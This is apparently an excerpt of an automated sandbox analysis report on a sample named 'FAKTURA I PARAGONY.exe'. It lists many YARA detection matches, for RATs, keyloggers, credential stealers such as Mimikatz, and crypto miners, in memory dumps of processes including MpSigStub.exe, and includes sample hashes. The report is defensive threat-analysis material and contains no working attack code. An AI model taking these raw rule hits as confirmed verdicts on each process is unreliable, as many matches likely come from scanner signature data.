    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
    Source: 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORYMatched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
    Source: 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Crypto Miner strings Author: Florian Roth
    Source: 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp, type: MEMORYMatched rule: 9002 Identifying Strings Author: Seth Hardy
    Source: 00000023.00000003.6278239354.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORYMatched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
    Source: 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
    Source: 00000023.00000003.6343112775.0000028BD6735000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Tofu Trojan Author: Cylance
    Source: 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp, type: MEMORYMatched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
    Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
    Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Ham_backdoor Author: Cylance Spear Team
    Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Red Leaves malware, related to APT10 Author: David Cannings
    Source: 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
    Source: 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
    Source: 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
    Source: 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, type: MEMORYMatched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
    Source: 00000023.00000003.6298208897.0000028BD6B04000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
    Source: 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp, type: MEMORYMatched rule: CVE_2018_4878_0day_ITW Author: unknown
    Source: 00000023.00000003.6324858901.0000028BD71BA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects a ZxShell - CN threat group Author: Florian Roth
    Source: 00000023.00000003.6287398810.0000028BD6B04000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
    Source: 00000023.00000003.6327648470.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORYMatched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
    Source: 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp, type: MEMORYMatched rule: Keylogger component Author: Microsoft
    Source: 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hack Deep Panda - htran-exe Author: Florian Roth
    Source: 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp, type: MEMORYMatched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
    Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Mirage Identifying Strings Author: Seth Hardy
    Source: 00000023.00000003.6348467864.0000028BD78B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
    Source: 00000023.00000003.6432796132.0000028BD7D95000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
    Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
    Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
    Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, type: MEMORYMatched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
    Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Pupy backdoor Author: Florian Roth
    Source: 00000023.00000003.6264910076.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORYMatched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
    Source: 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
    Source: 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
    Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
    Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects unspecified malware sample Author: Florian Roth
    Source: 00000023.00000003.6348949380.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORYMatched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
    Source: 00000023.00000003.6295229489.0000028BD65FD000.00000004.00000001.sdmp, type: MEMORYMatched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
    Source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
    Source: 00000023.00000003.6308819602.0000028BD71FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
    Source: 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
    Source: 00000023.00000003.6337514171.0000028BD6735000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Tofu Trojan Author: Cylance
    Source: 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects export from Gold Dragon - February 2018 Author: Florian Roth
    Source: 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Pupy backdoor Author: Florian Roth
    Source: 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp, type: MEMORYMatched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
    Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
    Source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
    Source: 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Pupy backdoor Author: Florian Roth
    Source: 00000023.00000003.6282034966.0000028BD78B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
    Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects OilRig malware Author: Eyal Sela
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: Detects Tofu Trojan Author: Cylance
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: Keylogger - generic rule for a Chinese variant Author: Florian Roth
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: Detects specific RedLeaves and PlugX binaries Author: US-CERT Code Analysis Team
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: Hack Deep Panda - htran-exe Author: Florian Roth
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: Detects Pupy backdoor Author: Florian Roth
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: Iron Panda Malware Htran Author: Florian Roth
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: 9002 Identifying Strings Author: Seth Hardy
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: Mirage Identifying Strings Author: Seth Hardy
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: NetWiredRC Author: Jean-Philippe Teissier / @Jipe_
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: PoisonIvy_3 Author: Kevin Breen <kevin@techanarchy.net>
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: CVE_2018_4878_0day_ITW Author: unknown
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exeSection loaded: edgegdi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dll
    Source: C:\Windows\System32\oobe\UserOOBEBroker.exeSection loaded: edgegdi.dll
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exeSection loaded: edgegdi.dll
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exeFile deleted: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\1.1.18500.10_to_1.1.18600.4_mpengine.dll._p
    Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2627396659.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePYRAMIDLIKE.exe vs FAKTURA I PARAGONY.exe
    Source: FAKTURA I PARAGONY.exeBinary or memory string: OriginalFilenamePYRAMIDLIKE.exe vs FAKTURA I PARAGONY.exe
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd62ff37e.139.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd62c32d4.74.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd62c32d4.170.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd62c283a.76.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd62c2d87.172.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd62c283a.171.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd62c2d87.75.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Source: FAKTURA I PARAGONY.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: 35.3.MpSigStub.exe.28bd63a2bca.206.unpack, type: UNPACKEDPEMatched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
    Source: 35.3.MpSigStub.exe.28bd75cd186.46.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
    Source: 35.3.MpSigStub.exe.28bd75cd186.46.raw.unpack, type: UNPACKEDPEMatched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
    Source: 35.3.MpSigStub.exe.28bd75cd186.46.raw.unpack, type: UNPACKEDPEMatched rule: Derusbi_Kernel_Driver_WD_UDFS date = 2015-12-15, hash4 = e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59, hash3 = 6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58, hash2 = 50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a, author = Florian Roth, description = Detects Derusbi Kernel Driver, reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016
    Source: 35.3.MpSigStub.exe.28bd75cd186.46.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
    Source: 35.3.MpSigStub.exe.28bd69011fa.70.raw.unpack, type: UNPACKEDPEMatched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 35.3.MpSigStub.exe.28bd78ce0e6.219.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
    Source: 35.3.MpSigStub.exe.28bd7b2bc01.176.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd718e899.156.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd718e899.156.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd68763ba.143.unpack, type: UNPACKEDPEMatched rule: APT_APT29_wellmess_dotnet_unique_strings author = NCSC, description = Rule to detect WellMess .NET samples based on unique strings and function/variable names, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 2285a264ffab59ab5a1eb4e2b9bcab9baf26750b6c551ee3094af56a4442ac41
    Source: 35.3.MpSigStub.exe.28bd6901bfe.72.raw.unpack, type: UNPACKEDPEMatched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 35.3.MpSigStub.exe.28bd63a15c6.205.raw.unpack, type: UNPACKEDPEMatched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
    Source: 35.3.MpSigStub.exe.28bd63a15c6.205.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd718d495.114.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd718d495.114.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd80b0d72.120.raw.unpack, type: UNPACKEDPEMatched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
    Source: 35.3.MpSigStub.exe.28bd80b0d72.120.raw.unpack, type: UNPACKEDPEMatched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
    Source: 35.3.MpSigStub.exe.28bd80b0d72.120.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 35.3.MpSigStub.exe.28bd7b2bc01.58.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd703f03e.63.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
    Source: 35.3.MpSigStub.exe.28bd7b2bc01.215.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd703fc42.61.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
    Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPEMatched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
    Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPEMatched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
    Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPEMatched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
    Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
    Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPEMatched rule: APT_APT41_POISONPLUG date = 2019-08-07, hash4 = 3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f, hash3 = f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661, hash2 = 5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90, author = Florian Roth, description = Detects APT41 malware POISONPLUG, reference = https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html, score = 2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd
    Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPEMatched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
    Source: 35.3.MpSigStub.exe.28bd780418a.59.raw.unpack, type: UNPACKEDPEMatched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 35.3.MpSigStub.exe.28bd780418a.59.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd72c6dd5.218.raw.unpack, type: UNPACKEDPEMatched rule: CredTheft_MSIL_TitoSpecial_1 author = FireEye, description = This rule looks for .NET PE files that have the strings of various method names in the TitoSpecial code., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 4bf96a7040a683bd34c618431e571e26
    Source: 35.3.MpSigStub.exe.28bd736083d.96.raw.unpack, type: UNPACKEDPEMatched rule: HackTool_Samples description = Hacktool, score =
    Source: 35.3.MpSigStub.exe.28bd7b65929.38.unpack, type: UNPACKEDPEMatched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
    Source: 35.3.MpSigStub.exe.28bd703e43a.62.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
    Source: 35.3.MpSigStub.exe.28bd77beebe.15.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XMRIG_String date = 2018-12-28, hash1 = eb18ae69f1511eeb4ed9d4d7bcdf3391a06768f384e94427f4fc3bd21b383127, author = Florian Roth, description = Detects a suspicious XMRIG crypto miner executable string in filr, reference = Internal Research
    Source: 35.3.MpSigStub.exe.28bd7098dc6.98.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd80e54d2.88.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
